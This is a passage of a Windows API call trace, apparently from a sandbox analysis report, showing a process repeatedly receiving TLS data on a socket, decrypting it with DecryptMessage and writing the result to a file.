MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de648, pfQOP=0x0) returned 0x0 [0071.396] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.397] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.397] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.397] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de75c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de75c, pfQOP=0x0) returned 0x0 [0071.397] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.397] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.397] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 459 [0071.397] recv (in: s=0x51c, buf=0x264fe4c, len=3669, flags=0 | out: buf=0x264fe4c*) returned 3669 [0071.523] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de870, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de870, pfQOP=0x0) returned 0x0 [0071.523] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.524] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.524] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.524] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de984, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de984, pfQOP=0x0) returned 0x0 [0071.524] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.524] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.524] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.524] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dea98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dea98, pfQOP=0x0) returned 0x0 [0071.524] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.524] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.524] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.525] DecryptMessage (in: phContext=0x267177c, pMessage=0x26debac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26debac, pfQOP=0x0) returned 0x0 [0071.525] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.525] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.525] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1447 [0071.525] recv (in: s=0x51c, buf=0x2650228, len=2681, flags=0 | out: buf=0x2650228*) returned 2681 [0071.681] DecryptMessage (in: phContext=0x267177c, pMessage=0x26decc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26decc0, pfQOP=0x0) returned 0x0 [0071.681] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.681] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.681] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 4614 [0071.681] recv (in: s=0x51c, buf=0x2650e87, len=7706, flags=0 | out: buf=0x2650e87*) returned 7706 [0071.775] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dedd4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dedd4, pfQOP=0x0) returned 0x0 [0071.775] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0071.775] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.775] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.775] DecryptMessage (in: phContext=0x267177c, pMessage=0x26deee8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26deee8, pfQOP=0x0) returned 0x0 [0071.775] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.776] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.776] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.776] DecryptMessage (in: phContext=0x267177c, pMessage=0x26deffc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26deffc, pfQOP=0x0) returned 0x0 [0071.776] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.776] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.777] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.777] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df110, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df110, pfQOP=0x0) returned 0x0 [0071.777] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.777] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.777] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 330 [0071.777] recv (in: s=0x51c, buf=0x264fdcb, len=3798, flags=0 | out: buf=0x264fdcb*) returned 3798 [0071.907] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df224, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df224, pfQOP=0x0) returned 0x0 [0071.907] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.907] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.907] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.907] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df338, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df338, pfQOP=0x0) returned 0x0 [0071.908] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.908] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.908] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3744 [0071.908] recv (in: s=0x51c, buf=0x2650b21, len=384, flags=0 | out: buf=0x2650b21*) returned 384 [0072.044] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df44c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df44c, pfQOP=0x0) returned 0x0 [0072.045] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.045] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.045] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.045] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df560, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df560, pfQOP=0x0) returned 0x0 [0072.045] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.046] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.046] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.046] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df674, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df674, pfQOP=0x0) returned 0x0 [0072.046] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.046] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.046] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3025 [0072.046] recv (in: s=0x51c, buf=0x2650852, len=1103, flags=0 | out: buf=0x2650852*) returned 1103 [0072.177] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df788, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df788, pfQOP=0x0) returned 0x0 [0072.177] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.177] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.177] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.177] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df89c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df89c, pfQOP=0x0) returned 0x0 [0072.177] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.178] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.178] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.178] DecryptMessage (in: phContext=0x267177c, pMessage=0x26df9b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26df9b0, pfQOP=0x0) returned 0x0 [0072.178] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.178] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.178] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3766 [0072.178] recv (in: s=0x51c, buf=0x2650b37, len=362, flags=0 | out: buf=0x2650b37*) returned 362 [0072.300] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dfac4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dfac4, pfQOP=0x0) returned 0x0 [0072.301] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.301] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.301] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 11313 [0072.301] recv (in: s=0x51c, buf=0x26528b2, len=1007, flags=0 | out: buf=0x26528b2*) returned 1007 [0072.428] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dfbd8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dfbd8, pfQOP=0x0) returned 0x0 [0072.428] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0072.429] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.429] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.429] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dfcec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dfcec, pfQOP=0x0) returned 0x0 [0072.429] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.429] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.429] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.429] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dfe00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dfe00, pfQOP=0x0) returned 0x0 [0072.430] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.430] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.430] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2402 [0072.430] recv (in: s=0x51c, buf=0x26505e3, len=1726, flags=0 | out: buf=0x26505e3*) returned 1726 [0072.484] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dff14, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dff14, pfQOP=0x0) returned 0x0 [0072.484] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.484] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.484] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1189 [0072.484] recv (in: s=0x51c, buf=0x2650126, len=2939, flags=0 | out: buf=0x2650126*) returned 2939 [0072.556] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0028, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0028, pfQOP=0x0) returned 0x0 [0072.556] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.557] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.557] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.557] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e013c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e013c, pfQOP=0x0) returned 0x0 [0072.557] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.557] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.557] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.559] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0250, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0250, pfQOP=0x0) returned 0x0 [0072.559] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.559] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.559] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 470 [0072.559] recv (in: s=0x51c, buf=0x264fe57, len=3658, flags=0 | out: buf=0x264fe57*) returned 3658 [0072.680] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0364, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0364, pfQOP=0x0) returned 0x0 [0072.680] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.680] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.680] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.680] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0478, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0478, pfQOP=0x0) returned 0x0 [0072.681] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.681] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.681] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.681] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e058c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e058c, pfQOP=0x0) returned 0x0 [0072.681] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.681] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.681] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2671 [0072.682] recv (in: s=0x51c, buf=0x26506f0, len=1457, flags=0 | out: buf=0x26506f0*) returned 1457 [0072.731] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e06a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e06a0, pfQOP=0x0) returned 0x0 [0072.731] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.731] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.732] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1458 [0072.732] recv (in: s=0x51c, buf=0x2650233, len=2670, flags=0 | out: buf=0x2650233*) returned 2670 [0072.840] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e07b4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e07b4, pfQOP=0x0) returned 0x0 [0072.840] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.840] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.840] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.840] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e08c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e08c8, pfQOP=0x0) returned 0x0 [0072.841] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.841] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.841] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0072.841] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e09dc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e09dc, pfQOP=0x0) returned 0x0 [0072.841] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0072.841] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0072.841] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 739 [0072.841] recv (in: s=0x51c, buf=0x264ff64, len=11581, flags=0 | out: buf=0x264ff64*) returned 11581 [0073.015] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0af0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0af0, pfQOP=0x0) returned 0x0 [0073.015] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0073.016] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.016] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.016] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0c04, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0c04, pfQOP=0x0) returned 0x0 [0073.016] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.016] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.016] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.016] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0d18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0d18, pfQOP=0x0) returned 0x0 [0073.017] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.017] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.017] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 588 [0073.017] recv (in: s=0x51c, buf=0x264fecd, len=3540, flags=0 | out: buf=0x264fecd*) returned 3540 [0073.057] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0e2c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0e2c, pfQOP=0x0) returned 0x0 [0073.057] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.057] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.057] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.057] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e0f40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e0f40, pfQOP=0x0) returned 0x0 [0073.058] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.058] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.058] recv (in: s=0x51c, 